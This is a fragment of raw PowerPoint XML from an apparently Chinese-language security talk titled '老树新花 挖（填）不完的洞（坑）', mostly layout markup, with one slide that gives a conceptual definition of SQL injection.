                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 7" descr="image.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4778197" y="4381548"/>
              <a:ext cx="262679" cy="513133"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8051801" y="4145340"/>
            <a:ext cx="761996" cy="1015998"/>
            <a:chOff x="6527801" y="4145340"/>
            <a:chExt cx="761996" cy="1015998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Oval 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6527801" y="4145340"/>
              <a:ext cx="761996" cy="1015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solidFill>
            <a:ln w="25402" cap="flat">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:tailEnd type="arrow"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="60963" tIns="45720" rIns="60963" bIns="45720" anchor="ctr" anchorCtr="1" compatLnSpc="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" hangingPunct="0">
                <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:uFillTx/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 10" descr="image.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6710488" y="4430414"/>
              <a:ext cx="378744" cy="447973"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="flat">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7051676" y="4145340"/>
            <a:ext cx="761996" cy="1015998"/>
            <a:chOff x="5527676" y="4145340"/>
            <a:chExt cx="761996" cy="1015998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Oval 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5527676" y="4145340"/>
              <a:ext cx="761996" cy="1015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solidFill>
            <a:ln w="25402" cap="flat">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:tailEnd type="arrow"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="60963" tIns="45720" rIns="60963" bIns="45720" anchor="ctr" anchorCtr="1" compatLnSpc="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" hangingPunct="0">
                <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:uFillTx/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="AutoShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5713802" y="4438049"/>
              <a:ext cx="365869" cy="352098"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="f0" fmla="val 10800000"/>
                <a:gd name="f1" fmla="val 5400000"/>
                <a:gd name="f2" fmla="val 180"/>
                <a:gd name="f3" fmla="val w"/>
                <a:gd name="f4" fmla="val h"/>
                <a:gd name="f5" fmla="val 0"/>
                <a:gd name="f6" fmla="val 21600"/>
                <a:gd name="f7" fmla="val 16538"/>
                <a:gd name="f8" fmla="val 19720"/>
                <a:gd name="f9" fmla="val 19721"/>
                <a:gd name="f10" fmla="val 4387"/>
                <a:gd name="f11" fmla="val 2713"/>
                <a:gd name="f12" fmla="val 1350"/>
                <a:gd name="f13" fmla="val 17824"/>
                <a:gd name="f14" fmla="val 15494"/>
                <a:gd name="f15" fmla="val 13992"/>
                <a:gd name="f16" fmla="val 1918"/>
                <a:gd name="f17" fmla="val 12635"/>
                <a:gd name="f18" fmla="val 2871"/>
                <a:gd name="f19" fmla="val 11862"/>
                <a:gd name="f20" fmla="val 3797"/>
                <a:gd name="f21" fmla="val 11123"/>
                <a:gd name="f22" fmla="val 3860"/>
                <a:gd name="f23" fmla="val 10975"/>
                <a:gd name="f24" fmla="val 3472"/>
                <a:gd name="f25" fmla="val 9647"/>
                <a:gd name="f26" fmla="val 3406"/>
                <a:gd name="f27" fmla="val 9374"/>
                <a:gd name="f28" fmla="val 3375"/>
                <a:gd name="f29" fmla="val 9136"/>
                <a:gd name="f30" fmla="val 8921"/>
                <a:gd name="f31" fmla="val 7626"/>
                <a:gd name="f32" fmla="val 4131"/>
                <a:gd name="f33" fmla="val 6573"/>
                <a:gd name="f34" fmla="val 5062"/>
                <a:gd name="f35" fmla="val 5505"/>
                <a:gd name="f36" fmla="val 6529"/>
                <a:gd name="f37" fmla="val 5976"/>
                <a:gd name="f38" fmla="val 6789"/>
                <a:gd name="f39" fmla="val 6750"/>
                <a:gd name="f40" fmla="val 7219"/>
                <a:gd name="f41" fmla="val 6834"/>
                <a:gd name="f42" fmla="val 6808"/>
                <a:gd name="f43" fmla="val 7200"/>
                <a:gd name="f44" fmla="val 5701"/>
                <a:gd name="f45" fmla="val 7974"/>
                <a:gd name="f46" fmla="val 3380"/>
                <a:gd name="f47" fmla="val 9652"/>
                <a:gd name="f48" fmla="val 1878"/>
                <a:gd name="f49" fmla="val 11476"/>
                <a:gd name="f50" fmla="val 13906"/>
                <a:gd name="f51" fmla="val 15915"/>
                <a:gd name="f52" fmla="val 4435"/>
                <a:gd name="f53" fmla="val 16149"/>
                <a:gd name="f54" fmla="val 7826"/>
                <a:gd name="f55" fmla="val 16232"/>
                <a:gd name="f56" fmla="val 9171"/>
                <a:gd name="f57" fmla="val 17240"/>
                <a:gd name="f58" fmla="val 9491"/>
                <a:gd name="f59" fmla="val 18985"/>
                <a:gd name="f60" fmla="val 9955"/>
                <a:gd name="f61" fmla="val 20251"/>
                <a:gd name="f62" fmla="val 12085"/>
                <a:gd name="f63" fmla="val 14555"/>
                <a:gd name="f64" fmla="val 17404"/>
                <a:gd name="f65" fmla="val 18586"/>
                <a:gd name="f66" fmla="val 17493"/>
                <a:gd name="f67" fmla="val 7647"/>
                <a:gd name="f68" fmla="val 17197"/>
                <a:gd name="f69" fmla="val 3362"/>
                <a:gd name="f70" fmla="val 14633"/>
                <a:gd name="f71" fmla="val 9031"/>
                <a:gd name="f72" fmla="val 6939"/>
                <a:gd name="f73" fmla="val 2017"/>
                <a:gd name="f74" fmla="val 4911"/>
                <a:gd name="f75" fmla="val 5685"/>
                <a:gd name="f76" fmla="val 4784"/>
                <a:gd name="f77" fmla="val 5383"/>
                <a:gd name="f78" fmla="val 4695"/>
                <a:gd name="f79" fmla="val 3385"/>
                <a:gd name="f80" fmla="val 2025"/>
                <a:gd name="f81" fmla="val 6589"/>
                <a:gd name="f82" fmla="val 9385"/>
                <a:gd name="f83" fmla="val 2092"/>
                <a:gd name="f84" fmla="val 9824"/>
                <a:gd name="f85" fmla="val 2191"/>
                <a:gd name="f86" fmla="val 10240"/>
                <a:gd name="f87" fmla="val 886"/>
                <a:gd name="f88" fmla="val 11298"/>
                <a:gd name="f89" fmla="val 13242"/>
                <a:gd name="f90" fmla="val 18866"/>
                <a:gd name="f91" fmla="val 1964"/>
                <a:gd name="f92" fmla="val 21599"/>
                <a:gd name="f93" fmla="val 19335"/>
                <a:gd name="f94" fmla="val 18446"/>
                <a:gd name="f95" fmla="val 11120"/>
                <a:gd name="f96" fmla="val 19832"/>
                <a:gd name="f97" fmla="val 8269"/>
                <a:gd name="f98" fmla="+- 0 0 -90"/>
                <a:gd name="f99" fmla="*/ f3 1 21600"/>
                <a:gd name="f100" fmla="*/ f4 1 21600"/>
                <a:gd name="f101" fmla="+- f6 0 f5"/>
                <a:gd name="f102" fmla="*/ f98 f0 1"/>
                <a:gd name="f103" fmla="*/ f101 1 21600"/>
                <a:gd name="f104" fmla="*/ f102 1 f2"/>
                <a:gd name="f105" fmla="*/ 182555 1 f103"/>
                <a:gd name="f106" fmla="*/ 131763 1 f103"/>
                <a:gd name="f107" fmla="*/ 0 1 f103"/>
                <a:gd name="f108" fmla="*/ 21600 1 f103"/>
                <a:gd name="f109" fmla="+- f104 0 f1"/>
                <a:gd name="f110" fmla="*/ f107 f99 1"/>
                <a:gd name="f111" fmla="*/ f108 f99 1"/>
                <a:gd name="f112" fmla="*/ f108 f100 1"/>
                <a:gd name="f113" fmla="*/ f107 f100 1"/>
                <a:gd name="f114" fmla="*/ f105 f99 1"/>
                <a:gd name="f115" fmla="*/ f106 f100 1"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="3cd4">
                  <a:pos x="hc" y="t"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="r" y="vc"/>
                </a:cxn>
                <a:cxn ang="cd4">
                  <a:pos x="hc" y="b"/>
                </a:cxn>
                <a:cxn ang="cd2">
                  <a:pos x="l" y="vc"/>
                </a:cxn>
                <a:cxn ang="f109">
                  <a:pos x="f114" y="f115"/>
                </a:cxn>
                <a:cxn ang="f109">
                  <a:pos x="f114" y="f115"/>
                </a:cxn>
                <a:cxn ang="f109">
                  <a:pos x="f114" y="f115"/>
                </a:cxn>
                <a:cxn ang="f109">
                  <a:pos x="f114" y="f115"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="f110" t="f113" r="f111" b="f112"/>
              <a:pathLst>
                <a:path w="21600" h="21600">
                  <a:moveTo>
                    <a:pt x="f7" y="f8"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="f7" y="f9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="f10" y="f9"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f11" y="f8"/>
                    <a:pt x="f12" y="f13"/>
                    <a:pt x="f12" y="f14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f12" y="f15"/>
                    <a:pt x="f16" y="f17"/>
                    <a:pt x="f18" y="f19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f20" y="f21"/>
                    <a:pt x="f22" y="f23"/>
                    <a:pt x="f24" y="f25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f26" y="f27"/>
                    <a:pt x="f28" y="f29"/>
                    <a:pt x="f28" y="f30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f28" y="f31"/>
                    <a:pt x="f32" y="f33"/>
                    <a:pt x="f34" y="f33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f34" y="f33"/>
                    <a:pt x="f35" y="f36"/>
                    <a:pt x="f37" y="f38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f39" y="f40"/>
                    <a:pt x="f41" y="f42"/>
                    <a:pt x="f43" y="f44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f45" y="f46"/>
                    <a:pt x="f47" y="f48"/>
                    <a:pt x="f49" y="f48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f50" y="f48"/>
                    <a:pt x="f51" y="f52"/>
                    <a:pt x="f53" y="f54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f55" y="f56"/>
                    <a:pt x="f55" y="f56"/>
                    <a:pt x="f57" y="f58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f59" y="f60"/>
                    <a:pt x="f61" y="f62"/>
                    <a:pt x="f61" y="f63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f61" y="f64"/>
                    <a:pt x="f65" y="f8"/>
                    <a:pt x="f7" y="f8"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="f66" y="f67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="f68" y="f69"/>
                    <a:pt x="f70" y="f5"/>
                    <a:pt x="f49" y="f5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f71" y="f5"/>
                    <a:pt x="f72" y="f73"/>
                    <a:pt x="f37" y="f74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f75" y="f76"/>
                    <a:pt x="f77" y="f78"/>
                    <a:pt x="f34" y="f78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f79" y="f78"/>
                    <a:pt x="f80" y="f81"/>
                    <a:pt x="f80" y="f30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f80" y="f82"/>
                    <a:pt x="f83" y="f84"/>
                    <a:pt x="f85" y="f86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f87" y="f88"/>
                    <a:pt x="f5" y="f89"/>
                    <a:pt x="f5" y="f14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f5" y="f90"/>
                    <a:pt x="f91" y="f92"/>
                    <a:pt x="f10" y="f92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="f10" y="f6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="f7" y="f6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="f7" y="f92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="f93" y="f92"/>
                    <a:pt x="f6" y="f94"/>
                    <a:pt x="f6" y="f63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="f6" y="f95"/>
                    <a:pt x="f96" y="f97"/>
                    <a:pt x="f66" y="f67"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:uFillTx/>
                </a:defRPr>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894402" y="5304864"/>
            <a:ext cx="7772400" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="60963" tIns="45720" rIns="60963" bIns="45720" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Light"/>
                <a:ea typeface="Open Sans Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Light"/>
                <a:ea typeface="Open Sans Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Light"/>
                <a:ea typeface="Open Sans Light"/>
              </a:rPr>
              <a:t>2017-6-x</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Open Sans Light"/>
              <a:ea typeface="Open Sans Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2742703" y="1318949"/>
            <a:ext cx="9528" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="45720" tIns="45720" rIns="45720" bIns="45720" anchor="ctr" anchorCtr="1" compatLnSpc="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877557" y="2022341"/>
            <a:ext cx="6970178" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" b="1" cap="all" spc="200" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>老树新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600" b="1" cap="all" spc="200" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>花</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" b="1" cap="all" spc="200" dirty="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" cap="all" spc="200" dirty="0" smtClean="0">
                <a:ln w="0"/>
                <a:effectLst>
                  <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>挖（填）不完的洞（坑）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" b="1" cap="all" spc="200" dirty="0">
              <a:ln w="0"/>
              <a:effectLst>
                <a:reflection blurRad="12700" stA="50000" endPos="50000" dist="5000" dir="5400000" sy="-100000" rotWithShape="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983068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ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838187" y="348314"/>
            <a:ext cx="8911976" cy="1292662"/>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i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>注入？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体" pitchFamily="2"/>
              </a:rPr>
              <a:t>是解释型语言，最后执行的代码是由程序编写的代码和用户提交的数据共同组成的。</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sz="1800" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体" pitchFamily="2"/>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871" y="2000680"/>
            <a:ext cx="6572250" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199285" y="1514280"/>
            <a:ext cx="6532021" cy="4292011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9863847" y="1819072"/>
